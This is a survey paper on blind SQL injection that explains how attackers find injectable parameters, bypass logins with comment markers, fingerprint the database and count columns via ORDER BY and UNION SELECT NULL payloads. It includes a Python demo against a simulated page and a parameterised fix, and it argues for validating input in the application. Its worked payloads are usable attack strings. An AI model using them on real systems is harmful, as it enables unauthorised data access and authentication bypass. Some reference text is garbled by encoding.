Javaphile: SQL Blind Injection
coolswallow of Javaphile (coolswallow@shaolin.org.cn)
Blind SQL Injection Techniques: A Survey
Abstract: This paper surveys current blind SQL injection techniques. It first introduces the definition of SQL injection and the risk it poses, and reviews several solutions proposed for the problem together with the drawbacks of each. It then discusses how, when detailed error messages are suppressed, an attacker can still identify SQL injection from the server's minimal reaction, identify the vulnerable parameters, generate valid injection syntax and build the required exploit. Finally, injection of UNION SELECT statements is described in detail, including how to count the columns and how to identify the column types. Although the examples refer to Microsoft SQL Server and Oracle only, the same techniques apply to other databases as well. The paper aims to make it clear that application-level vulnerabilities must be handled by application-level solutions, and that relying on suppressed error messages for protection against SQL injection is ultimately useless.
Key words: SQL Injection; Blind Injection; Database Attack; Web Application Security
1 Introduction
1.1 Conventional SQL injection techniques
There is as yet no single agreed definition of SQL injection; the two most common descriptions are:
(1) an attack by injection of script;
(2) malicious user input that alters the SQL script the server executes.
Chris Anley defines it as follows: when an attacker can insert a series of SQL statements into a query by writing them into a string that the application passes on, that is SQL injection. Stephen Kost describes it as a way of obtaining unauthorised access to, or directly retrieving data from, a database. In essence the attack is aimed at the application rather than the database: the attacker supplies SQL to an application that has the flaw of building its statements from user input, and the injection takes place at the moment the application assembles those statements. SQL injection is therefore a vulnerability found in a great many database-driven applications: by appending SQL elements to a query the application has predefined, the attacker tricks the database into executing an unauthorised query. The application is usually a web application, and the user's input is embedded in the SQL that the application sends to the database for execution. With suitably crafted input, the attacker obtains results the application was never meant to return.
From the defensive point of view, SQL injection is comparable to a buffer overflow vulnerability, and it lets the attacker walk around the site's firewall. The firewall has to let users reach the application on the Internet-facing web server, so once the application has an injection vulnerability the attacker talks to the database directly, with every privilege of the account the application uses to connect to it.
SQL injection attacks are widespread because SQL itself is widespread. Every database that speaks SQL is affected, including SQL Server, Oracle, MySQL, DB2 and Informix, and so is every application platform built on top of them, such as Active Server Pages, Java Server Pages, Cold Fusion, PHP and Perl. The details differ from product to product, but the principle of the attack is the same everywhere; because database systems and the applications on them are so widely deployed, injection vulnerabilities are easy to find, which makes SQL injection one of the most common forms of injection attack.
For a detailed treatment of conventional SQL injection against MS SQL Server, see Chris Anley's papers "Advanced SQL Injection In SQL Server Applications" and "(more) Advanced SQL Injection", Cesar Cerrudo's "Manipulating Microsoft SQL Server Using SQL Injection", and the white paper by Kevin Spett of SPI Dynamics, "SQL Injection - Are your web applications vulnerable?". For conventional SQL injection against Oracle, see Stephen Kost's "Introduction to SQL Injection Attacks for Oracle Developers".
1.2 Defences against SQL injection attacks
As more and more attacks use SQL injection, many ways of closing injection vulnerabilities have been proposed. The methods currently in use are mainly:
(1) checking the validity of submitted data before the database is accessed;
(2) encapsulating the data submitted by the client, which requires support from the RDBMS;
(3) replacing or deleting dangerous strings and characters;
(4) suppressing error messages.
Method (1) means the server rejects every parameter that does not match the expected format before it is used, and it is the one way to build an application that is secure by construction. Applications should be written to access the database safely, but many developers lack sufficient security awareness, and injection vulnerabilities turn up even in reputable products. Method (2) depends on RDBMS support, and at present only Oracle provides it. Method (3) is an incomplete measure: if the client sends ccmdmcmdd and every occurrence of the string cmd is removed, what remains is exactly cmd. Method (4) is the most common today. Much of the security literature treats SQL injection as dependent on error messages, because the attacker collects information from the detailed errors the server returns, and many security specialists have concluded that hiding those messages stops injection attacks, on the grounds that the attack cannot be carried out without detailed error information.
In fact, suppressing error messages changes nothing in the server-side processing that causes the problem, and in practice sites that rely on it alone remain vulnerable. Blind SQL injection is the set of techniques an attacker uses in exactly this setting, where error messages are suppressed and the injection has to be carried out without them.
1.3 Organisation of this paper
To carry out a blind injection, the attacker first looks for the server's minimal reaction that reveals an SQL injection vulnerability, then confirms it by replacing the injected parameter with equivalent SQL expressions, and finally, with no detailed error information at all, injects UNION SELECT statements. The blind injection discussed here assumes the attacker knows nothing in advance about the application or about the type and structure of the database; all of that has to be discovered through the injection itself.
2 Identifying injection vulnerabilities
Before mounting an SQL injection attack the attacker must of course establish that the application is injectable. Where the developers have done some work to hide errors, the most obvious error messages are gone, but the attacker can still make the determination by learning to recognise the signs of an error, looking for them, and deciding whether they are related to SQL.
2.1 Identifying errors
The most important and most visible error an application can produce is a web server exception, a "500: Internal Server Error". In conventional SQL injection an unclosed quote or a similar mistake makes the server throw exactly this kind of exception. To hide it, the developer only needs to replace the default error message with a neutral HTML page; but as long as the attacker can observe a difference in the response, the fact that an error occurred is still established. Some servers go further and, on an exception, redirect to the previous page or to the home page, or show a brief error message that gives no detail.
The second kind of error is generated by the application itself, which reflects a better programming habit. When the application receives an invalid parameter it reports a specific error, which may arrive as a valid response (200 OK) page, as a redirect, or as a message carried in an "Internal Server Error".
To see the difference, consider two applications A and B that both use a proddetails.asp page taking a ProdID parameter, fetching the product's details from the database and processing the result. Normally a user reaches proddetails.asp only from a product list page, so ProdID is always valid. Application A therefore performs no checks; when the attacker tampers with ProdID and supplies an id that does not exist, the database returns an empty record set, which application A does not expect, and when it tries to use the first record an exception is raised and a "500: Internal Server Error" results. Application B checks the size of the record set before using it; if it is 0, it shows a "product does not exist" page, or treats the request as bad and redirects back to the product list.
To carry out blind SQL injection, the attacker therefore starts by submitting a few invalid parameters and watching how the application treats them and what happens when an SQL error occurs.
2.2 Locating errors
Once the attacker can recognise errors, the next step is to locate them. For this the attacker uses the usual SQL injection tests, a few SQL keywords (OR, AND and so on) and a few meta-characters (quote, semicolon and so on), against each parameter in turn, and watches whether the application fails. A tool such as an intercepting proxy makes it easy to see redirects and other responses that a browser would hide. Every parameter that causes a failure may be vulnerable to SQL injection. While one parameter is being tested all the others must be kept valid, otherwise errors caused by them would confuse the result. The outcome is a list of candidate parameters, some of which really are injectable while others fail for reasons unrelated to SQL; the attacker now has to single out the ones that can be exploited, a step that may be called identifying the injection point.
2.3 Identifying the injection parameter
Parameters in SQL statements fall into two main types, numbers and strings (dates are a third); each has its own characteristics, but both can be injected. Every parameter an application passes to an SQL query belongs to one of these types: a string value must be enclosed in quotes, a number need not be, for example:
SELECT * FROM Products WHERE ProdID = 4
SELECT * FROM Products WHERE ProdName = 'Book'
Whatever the type of the parameter, the test is the same: replace the value with an expression of the same type that evaluates to the same value, and compare the server's response with the one for the original value. Take a numeric parameter first:
/mysite/proddetails.asp?ProdID=4
One way to test it is to send 4' and then 3+1 in place of 4. Passed straight into the SQL text, these produce:
(1) SELECT * FROM Products WHERE ProdID = 4'
(2) SELECT * FROM Products WHERE ProdID = 3 + 1
The first statement is a syntax error. If the second executes normally and returns the same product (ProdID 4) as the original request, the parameter is being pasted into the query unchecked, that is, it is injectable.
The same idea applies to string parameters, with the value replaced by a string expression of equal value. The first test shows whether a stray quote breaks the statement; the second relies on string concatenation, whose operator differs between databases: MS SQL Server uses +, Oracle uses ||.
/mysite/proddetails.asp?ProdName=Book
To test whether ProdName is injectable, Book is first replaced with the invalid string Book' and then with the equivalent expression B'+'ook (B'||'ook on Oracle), giving:
(1) SELECT * FROM Products WHERE ProdName = 'Book''
(2) SELECT * FROM Products WHERE ProdName = 'B' + 'ook'
Again the first statement fails, while the second should return the product named Book.
Note that even when the application filters the ' and + meta-characters, the attacker can try to get them past the filter by URL-encoding them (the hexadecimal ASCII code of the character), for example:
/mysite/proddetails.asp?ProdID=3+1 becomes /mysite/proddetails.asp?ProdID=3%2B1
/mysite/proddetails.asp?ProdName=B'+'ook becomes /mysite/proddetails.asp?ProdName=B%27%2B%27ook
(In a query string a literal + is decoded as a space, so 3+1 has to be sent as 3%2B1 in any case.)
Likewise, any expression that evaluates to the expected value can stand in for the parameter, including database system functions. For a date parameter, Oracle's sysdate and SQL Server's getdate() each return a date expression, and the fact that a different function works on each database serves the same purpose.
The above shows that, even without detailed error messages, deciding whether a parameter is vulnerable to SQL injection remains a fairly easy matter for the attacker.
3 Carrying out the injection
Once the injection point has been found, exploiting it takes three steps: getting the injection syntax right, determining the type of the back-end database, and then injecting the attack code.
3.1 Getting the injection syntax right
Even in blind injection this step has its tricks. When the SQL statement behind the parameter is simple, getting the injection syntax right is simple too; when the statement is more complex, the attacker has to discover by trial and error the elements of the statement that matter.
Finding the right syntax is usually based on a SELECT ... WHERE statement in which the injected parameter (the injection point) is part of the WHERE clause. To find the right syntax the attacker must be able to alter the WHERE clause so that the query returns something other than what was expected. In simple applications OR 1=1 is enough; with more complex code the main obstacle is parentheses, which must be balanced against the ones already used in the statement. Such tampering often makes the application fail in what it does with the query result rather than in the query itself: an application that expects exactly one record may break when OR 1=1 makes the database return a thousand. A WHERE clause is essentially a set of TRUE/FALSE expressions joined by OR and AND, so the attacker has to judge each attempt from its effect on the result; for example, AND 1=2 makes the whole expression FALSE, whereas OR 1=2 leaves its value unchanged (keeping operator precedence in mind).
For some injections changing the WHERE clause is enough. For others, such as UNION SELECT injection or calling stored procedures, the original SQL statement has to be terminated cleanly so that a further statement can follow. Here the attacker can use the SQL comment marker (two hyphens, --), which on SQL Server comments out the rest of the line. Take a login page that asks for a user name and password and builds the statement:
SELECT Username, UserID, Password FROM Users WHERE Username = 'user' AND Password = 'pass'
Submitting john'-- as the user name yields the WHERE clause:
WHERE Username = 'john' --' AND Password = 'pass'
This statement has no SQL error and, since the password check has been commented out, it lets the attacker pass authentication. If instead the WHERE clause is written with parentheses:
WHERE (Username = 'user' AND Password = 'pass')
the same user name john'-- yields:
WHERE (Username = 'john' --' AND Password = 'pass')
which has an unmatched parenthesis and is not executed.
This shows that the comment marker also tells the attacker whether the statement was terminated cleanly: no error after adding the comment marker means the statement up to that point was complete, while an error means more work is needed to close it.
3.2 Identifying the database
Once the right injection syntax is known, the attacker starts injecting to determine the type of the back-end database. This is easier than finding the syntax, and it rests on a few simple tricks that exploit differences between database implementations. Only Oracle and MS SQL Server are covered here.
The first method uses the string concatenation operator mentioned above. With the syntax settled, the attacker adds to the WHERE clause an expression whose truth depends on a string comparison, for example:
AND 'xxx' = 'x' + 'xx'
sent URL-encoded as
AND %27xxx%27+%3D+%27x%27+%2B+%27xx%27
Replacing + with || and seeing which version keeps the query working tells Oracle and MS SQL Server apart.
The second method uses the semicolon. In SQL the semicolon separates statements placed on one line, and it can be injected too, but Oracle does not accept a semicolon in an injected statement. If the comment marker test above produced no error, adding a semicolon in front of the comment marker has no effect on MS SQL Server, while Oracle returns an error. COMMIT can be used to confirm that a statement after the semicolon really executed (for example by injecting xxx' ; COMMIT --): no error means the extra statement ran.
The third method uses functions that can stand in for a value, as shown in section 2.3. System functions differ between databases, so they also reveal the database type: getdate() returns the current date on MS SQL Server, sysdate does so on Oracle.
3.3 Injecting the attack code
Once this information has been collected, the attacker can start injecting to exploit the vulnerability. Building the attack code also needs no detailed error messages, so the code itself can be taken from the existing SQL injection literature.
Exploitation through SQL injection has been discussed at length elsewhere; this paper covers only one case in the next section, UNION SELECT injection.
4 UNION SELECT injection
Injecting by tampering with the WHERE clause of a SELECT works against many applications, and in the blind case the attacker can still go further and use a UNION SELECT statement, because, unlike the parameters of a WHERE clause, a UNION SELECT reaches other tables of the database even when no error information is returned.
A UNION SELECT injection requires knowing in advance the number of columns in the original query and the type of each, information that is generally assumed to be unobtainable without detailed error messages. The rest of this section shows how to obtain it anyway.
Note that UNION SELECT is used only after the injection syntax has been settled; the previous section showed that this is entirely feasible in blind injection, so any parentheses and the like in the SQL preceding the UNION SELECT have already been dealt with and the UNION can be injected successfully. UNION SELECT further requires that both queries return the same number of columns with the same types, otherwise it fails.
4.1 Counting the columns
When error messages are available, counting the columns is easy: the attacker injects UNION SELECT with a different number of fields each time until the error changes from "column count mismatch" to "column type mismatch"; the count tried at that point is the right one. In blind injection, this error-driven method is of no use.
A simple alternative uses the ORDER BY clause. ORDER BY in a SELECT changes the order of the returned records, and the sort column can be given either by name or by its position in the result. For example, given a query that looks up a product by its number, the following is a valid injection:
SELECT ProdNum FROM Products WHERE (ProdID=1234) ORDER BY ProdNum -- AND ProdName='Computer') AND UserName='john'
Here ORDER BY names the ProdNum column, which is also the first column of the result, so injecting 1234) ORDER BY 1 -- returns the same result. If the query has only one field, injecting 1234) ORDER BY 2 -- fails because it refers to a second field that does not exist. ORDER BY can therefore count the columns. Every SELECT returns at least one field, so the attacker first injects ORDER BY 1 to confirm that the syntax executes correctly (if sorting by the first field is rejected, adding the keyword ASC or DESC sometimes helps). Once the ORDER BY syntax is known to work, the attacker raises the column number from 1 upward, to 100 or even 1000 if need be, until the statement fails because the number is out of range; the last number that worked is the column count. In practice some columns may not be sortable, so when an error appears it pays to try one or two more numbers before concluding that the highest column has been reached.
4.2 Identifying column types
After counting the columns the attacker has to determine their types, and here too blind injection has its tricks. UNION SELECT requires the columns of both queries to match in number and type, and brute-forcing the type combinations becomes impractical as the number of columns grows. Assuming only three possible types (number, string and date), a query with 10 columns gives 3^10, about 60,000, combinations; even at 20 attempts per second that is nearly an hour, and more columns make the time unacceptable.
A simple way round this is to inject the SQL keyword NULL instead of static values. Unlike a string or a number, NULL matches any column type, so a UNION SELECT in which every selected field is NULL produces no type-mismatch error. Consider the earlier example again:
SELECT ProdNum,ProdType,ProdPrice,ProdProvider FROM Products
WHERE (ProdID=1234 AND ProdName='Computer') AND UserName='john'
Assuming the attacker has established that the query has 4 columns, a UNION SELECT with every field NULL is easy to build. It may need a FROM clause naming a table the attacker is allowed to read: MS SQL Server allows omitting FROM altogether, while on Oracle the dual table can be used. A WHERE clause that is always FALSE (WHERE 1=2) is added so that the UNION part returns no rows at all and cannot cause any further error. On MS SQL Server the injection produces:
SELECT ProdNum,ProdType,ProdPrice,ProdProvider FROM Products
WHERE (ProdID=1234) UNION SELECT NULL,NULL,NULL,NULL
WHERE 1=2 -- AND ProdName='Computer') AND UserName='john'
The purpose of injecting NULL is not to return data but to build a UNION SELECT that cannot fail, which confirms that the UNION is executed correctly. It also gives 100% confirmation of the database type: the FROM clause can name a table that only one database ships with.
Once the NULL injection executes cleanly, the type of each column can be determined quickly. Each attempt tests a single column by replacing its NULL with a number and, if that fails, with a string, so every column is settled in at most two attempts. Taking ProdNum as a numeric column and the other three as strings, the following injections, tried in turn, pin down the types (the response is either the normal page or the suppressed error):
1234) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 --
    syntax correct; the database is MS SQL Server (no FROM clause was needed)
1234) UNION SELECT 1,NULL,NULL,NULL WHERE 1=2 --
    the first column is numeric
1234) UNION SELECT 1,2,NULL,NULL WHERE 1=2 --
    error: the second column is not numeric
1234) UNION SELECT 1,'2',NULL,NULL WHERE 1=2 --
    the second column is a string
1234) UNION SELECT 1,'2',3,NULL WHERE 1=2 --
    error: the third column is not numeric
1234) UNION SELECT 1,'2','3',NULL WHERE 1=2 --
    the third column is a string
1234) UNION SELECT 1,'2','3',4 WHERE 1=2 --
    error: the fourth column is not numeric
1234) UNION SELECT 1,'2','3','4' WHERE 1=2 --
    the fourth column is a string
Now that the attacker knows the type of every column, the blind injection proceeds like any other: data is read from the database tables, and table and column names are obtained from the database itself or guessed from the application. These steps are already covered in other SQL injection material and are not repeated here.
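As an added example (not code from the paper), the Python script below runs three of the probes described above against a simulated proddetails.asp: the numeric and string tests of section 2.3 (4' against 3+1, Book' against B'||'ook), the concatenation-operator fingerprint of section 3.2, and the ORDER BY column count of section 4.1 confirmed with a UNION SELECT of NULLs, terminated with the -- comment marker of section 3.1. An in-memory SQLite database stands in for the back end, which is an assumption: SQLite uses the Oracle-style || operator, and because it does not enforce column types the per-column type probe of section 4.2 raises no errors there and is not shown. The Products table and its column names are the paper's; the rows are constructed. The page answers only with a generic 500 or a 200 page and never leaks error text, and a parameterised version of the same page is included so the probes can be seen failing against it.

```python
"""Blind SQL injection probes against a simulated product page.

Added example, not code from the paper.  An in-memory SQLite database stands
in for the back end (an assumption: its concatenation operator is the
Oracle-style '||'); the Products table and column names are the paper's,
the rows are constructed.
"""
import sqlite3
from typing import Callable, Optional, Tuple

Response = Tuple[int, str]       # (HTTP status, body) as the browser sees it
Page = Callable[..., Response]

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE Products (ProdID INTEGER, ProdName TEXT,
                           ProdPrice REAL, ProdProvider TEXT);
    INSERT INTO Products VALUES (3, 'Pen', 1.5, 'ACME'), (4, 'Book', 12.0, 'ACME');
""")
SELECT = "SELECT ProdID, ProdName, ProdPrice, ProdProvider FROM Products "


def render(sql: str, params: tuple = ()) -> Response:
    """Run the query and answer like a hardened server: no error detail leaks."""
    try:
        rows = conn.execute(sql, params).fetchall()
    except sqlite3.Error:
        return 500, "Internal Server Error"
    if not rows:
        return 200, "Product not found"
    return 200, "Product %s: %s" % (rows[0][0], rows[0][1])


def proddetails(prodid: Optional[str] = None, prodname: Optional[str] = None) -> Response:
    """Vulnerable proddetails.asp: the parameter is pasted into the SQL text."""
    if prodid is not None:
        return render(SELECT + "WHERE ProdID = " + prodid)
    return render(SELECT + "WHERE ProdName = '" + str(prodname) + "'")


def proddetails_safe(prodid: Optional[str] = None, prodname: Optional[str] = None) -> Response:
    """Same page with bound parameters: the application-level fix the paper calls for."""
    if prodid is not None:
        return render(SELECT + "WHERE ProdID = ?", (prodid,))
    return render(SELECT + "WHERE ProdName = ?", (prodname,))


def probe_numeric(page: Page, value: int) -> bool:
    """Section 2.3, numeric parameter: 4' must break the statement while 3+1
    must give exactly the page that 4 gives.  Only the response shape is
    compared, never an error message."""
    base = page(prodid=str(value))
    broken = page(prodid="%d'" % value)
    arithmetic = page(prodid="%d+1" % (value - 1))
    return broken != base and arithmetic == base


def probe_string(page: Page, value: str, concat: str) -> bool:
    """Section 2.3, string parameter: Book' must break, B'<op>'ook must match."""
    base = page(prodname=value)
    broken = page(prodname=value + "'")
    split = page(prodname="%s'%s'%s" % (value[0], concat, value[1:]))
    return broken != base and split == base


def fingerprint_concat(page: Page, value: str) -> Optional[str]:
    """Section 3.2: the operator that keeps the page intact tells the DBMS
    family apart ('+' on MS SQL Server, '||' on Oracle and on SQLite)."""
    for op in ("+", "||"):
        if probe_string(page, value, op):
            return op
    return None


def count_columns(page: Page, value: int, limit: int = 20) -> int:
    """Section 4.1: ORDER BY n works up to the column count of the original
    SELECT and fails at n+1; '--' (section 3.1) comments out the query tail.
    Returns 0 when even ORDER BY 1 changes the page, i.e. nothing is injected."""
    base = page(prodid=str(value))
    for n in range(1, limit + 1):
        if page(prodid="%d ORDER BY %d --" % (value, n)) != base:
            return n - 1
    raise ValueError("no ORDER BY term failed within %d columns" % limit)


def union_null_matches(page: Page, value: int, n: int) -> bool:
    """Section 4.1 check: a UNION SELECT of n NULLs that returns no rows
    (WHERE 1=2) must leave the page unchanged; a wrong n must not."""
    nulls = ",".join(["NULL"] * n)
    injected = "%d UNION SELECT %s WHERE 1=2 --" % (value, nulls)
    return page(prodid=injected) == page(prodid=str(value))


if __name__ == "__main__":
    for name, page in (("vulnerable", proddetails), ("parameterised", proddetails_safe)):
        cols = count_columns(page, 4)
        print("%-13s numeric=%s concat=%s columns=%d union_ok=%s" % (
            name, probe_numeric(page, 4), fingerprint_concat(page, "Book"),
            cols, union_null_matches(page, 4, cols) if cols else False))
```

Running the file prints the results for both pages: against the vulnerable page the probes report an injectable numeric parameter, the || operator and four columns, while against the parameterised page every probe fails, because a bound parameter is compared as a value and never reaches the SQL parser. The decision in every probe rests only on whether the response changes shape, which is all an attacker gets when error details are suppressed.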
5 Conclusion
The blind SQL injection techniques described here show that, even with error messages suppressed, SQL injection vulnerabilities can still be exploited. Many applications that have taken measures such as hiding error messages or replacing dangerous characters remain injectable. A vulnerability at the application level can only be closed at the application level: developers must be security-aware, source code must be reviewed for security, and every submitted parameter must be validated before the database is accessed. That is the only way to eliminate injection at its root.
References:
Microsoft China Technology Center, SQL Server ȫع, http://www.microsoft.com/china/ctc/Newsletter/04/ctc2.htm, 2004.
Anley, C., Advanced SQL Injection In SQL Server Applications, An NGSSoftware Insight Security Research (NISR) Publication, http://www.ngssoftware.com/papers/advanced_sql_injection.pdf, 2002.
Kost, S., Introduction to SQL Injection Attacks for Oracle Developers, Integrigy Corporation, http://www.net-security.org/dl/articles/IntegrigyIntrotoSQLInjectionAttacks.pdf, 2004.
Anley, C., (more) Advanced SQL Injection, An NGSSoftware Insight Security Research (NISR) Publication, http://www.ngssoftware.com/papers/more_advanced_sql_injection.pdf, 2002.
Cerrudo, C., Manipulating Microsoft SQL Server Using SQL Injection, http://www.appsecinc.com/presentations/Manipulating_SQL_Server_Using_SQL_Injection.pdf, 2002.
Spett, K., SQL Injection - Are your web applications vulnerable?, http://www.spidynamics.com/papers/SQLInjectionWhitePaper.pdf, 2002.
ҳ:
[1]